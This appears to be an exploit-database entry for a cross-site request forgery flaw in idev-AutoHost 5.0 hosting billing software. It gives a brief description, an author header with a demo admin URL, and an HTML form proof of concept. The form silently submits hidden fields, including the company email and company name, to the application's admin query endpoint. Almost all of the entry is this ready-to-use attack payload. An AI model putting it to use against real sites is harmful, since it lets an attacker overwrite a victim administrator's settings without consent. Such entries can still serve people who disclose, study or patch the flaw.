idev-AutoHost version 5.0 suffers from a cross site request forgery vulnerability.
6c7715c88859cf66d6054fba969b463ea684117a03a8c667395262c4c2301299
# Exploit Title: idev-AutoHost 5.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/idevautohost-50-hosting-billing-software/31713/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-autohost/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form name="form1" method="post" action="../library/query.php">
<input name="COMPANYEMAIL" size="40" class="textarea100" value="mail@mail.com" type="hidden">
<input name="COMPANYNAME" size="40" class="textarea100" value="idev-AutoHost" type="hidden">
<input name="YOURNAME" size="40" class="textarea100" value="idev-AutoHost Demo" type="hidden">
<input name="EMAILAPPEND" size="40" class="textarea100" value="idev-AutoHost Demo" type="hidden">
<input name="AFFID" class="textarea100" value="" type="hidden">
<select name="HELPBOX" size="1">
<option> </option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>